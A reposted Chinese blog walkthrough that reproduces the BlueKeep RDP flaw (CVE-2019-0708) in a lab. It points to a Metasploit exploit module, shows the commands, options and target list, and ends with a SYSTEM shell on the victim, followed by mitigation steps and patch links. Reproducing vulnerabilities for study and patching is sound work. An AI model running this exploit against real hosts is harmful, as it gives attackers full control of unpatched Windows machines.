碼上快樂

相關內容    簡體    繁體

CVE-2019-0708(非藍屏poc)遠程桌面代碼執行漏洞復現

本文轉載自   查看原文   2019-09-07 21:10   3175    內網滲透&&域滲透/ 紅隊功防技術/ 內網滲透 web安全 web滲透 msf kali 端口轉發 隧道代理/ 后門維持/ 提權

玩了幾天 剛回成都  玩電腦復現一下~

內核漏洞原理暫時 沒看懂 別問 ,問就是不懂

 

 

0x01 復現環境和Exp准備

漏洞影響范圍

  • Windows 7
  • Windows Server 2008 R2
  • Windows Server 2008
  • Windows 2003
  • Windows XP

 

 

 

靶機環境准備

MSDN下載 

Windows7 SP1下載鏈接:ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/

 

exp可以直接下載rdp.rb 可以直接更新msf

 

地址https://github.com/qinggegeya/CVE-2019-0708-EXP-MSF-

 

 

 

 

 

 

 

 

 

 

 

 

攻擊機環境准備

 

msf更新加載下腳本

如果kalimsf的版本太低 不能加載。

 

 

 

 

更新后加載

msf5 > search BlueKeep

Matching Modules
================

   #  Name                                            Disclosure Date  Rank    Check  Description
   -  ----                                            ---------------  ----    -----  -----------
   0  exploit/windows/rdp/cve_2019_0708_bluekeep_rce  2019-05-14       manual  Yes    CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free
   1  auxiliary/scanner/rdp/cve_2019_0708_bluekeep    2019-05-14       normal  Yes    CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check

 

 

 

 

 

 

 

 

 

 

 

 

 

0x02 漏洞利用

靶機ip: 192.168.5.22

 

 

 

 

msf:

 

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

 

 

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options 

Module options (exploit/windows/rdp/cve_2019_0708_bluekeep_rce):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   RDP_CLIENT_IP    192.168.0.100    yes       The client IPv4 address to report during connect
   RDP_CLIENT_NAME  ethdev           no        The client computer name to report during connect, UNSET = random
   RDP_DOMAIN                        no        The client domain name to report during connect
   RDP_USER                          no        The username to report during connect, UNSET = random
   RHOSTS           192.168.5.19     yes       The target address range or CIDR identifier
   RPORT            3389             yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic targeting via fingerprinting

 

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show targets 

Exploit targets:

   Id  Name
   --  ----
   0   Automatic targeting via fingerprinting
   1   Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
   2   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
   3   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
   4   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)

RDP_CLIENT_IP為已經連接上要攻擊的服務器的客戶端ip地址

沒啥好說的

 

 

 

target選錯就藍屏

 

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

 

meterpreter > shell
Process 996 created.
Channel 1 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>

 

08 r2的要改個注冊表才行 不實驗了

 

 

0x03 修復及其他

CVE-2019-0708漏洞修復補丁以及安全建議

計算機右鍵屬性-遠程設置-僅允許運行使用網絡基本身份驗證的遠程桌面的計算機連接(更安全)(N),在這行點勾,然后確認即可,可以臨時的防止漏洞的攻擊。

安全策略,禁止掉3389遠程端口,只允許自己的IP通信即可。

 

 

補丁:

1.Windows Server 2008 漏洞補丁系列下載地址

Windows Server 2008 32位系統:

http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.0-kb4499149-x86_832cf179b302b861c83f2a92acc5e2a152405377.msu

Windows Server 2008 x64位系統:

http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.0-kb4499149-x64_9236b098f7cea864f7638e7d4b77aa8f81f70fd6.msu

Windows Server 2008 R2 Itanium系統:

http://download.windowsupdate.com/c/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-ia64_fabc8e54caa0d31a5abe8a0b347ab4a77aa98c36.msu

Windows Server 2008 R2 x64系統:

http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-x64_3704acfff45ddf163d8049683d5a3b75e49b58cb.msu

Windows Server 2008 Itanium:

http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.0-kb4499180-ia64_805e448d48ab8b1401377ab9845f39e1cae836d4.msu

2.Windows Server 2003 漏洞補丁系列下載地址

Windows Server 2003 32位系統:

http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x86-custom-chs_4892823f525d9d532ed3ae36fc440338d2b46a72.exe

Windows Server 2003 64位系統:

http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x64-custom-chs_f2f949a9a764ff93ea13095a0aca1fc507320d3c.exe

3. Windows XP 漏洞補丁系列下載地址

Windows XP SP3 32位系統:

http://download.windowsupdate.com/c/csa/csa/secu/2019/04/windowsxp-kb4500331-x86-custom-chs_718543e86e06b08b568826ac13c05f967392238c.exe

Windows XP SP2 64位系統:

http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x64-custom-enu_e2fd240c402134839cfa22227b11a5ec80ddafcf.exe

Windows XP SP3 for XPe:

http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsxp-kb4500331-x86-embedded-custom-chs_96da48aaa9d9bcfe6cd820f239db2fe96500bfae.exe

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 遠程桌面遠程代碼執行漏洞(CVE-2019-0708)Poc CVE-2019-0708—微軟RDP遠程桌面代碼執行漏洞復現 Windows CVE-2019-0708 遠程桌面代碼執行漏洞復現 CVE-2019-0708 遠程桌面代碼執行漏洞復現 CVE-2019-0708遠程桌面代碼執行漏洞復現 遠程桌面最新漏洞CVE-2019-0708 POC利用復現 CVE-2019-0708遠程桌面服務遠程執行代碼漏洞exp利用過程 CVE-2019-0708 | 遠程桌面服務遠程執行代碼漏洞修復 windows RDP遠程代碼執行_CVE-2019-0708漏洞復現 Window 遠程桌面漏洞風險,各個廠家的掃描修復方案(CVE-2019-0708)
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM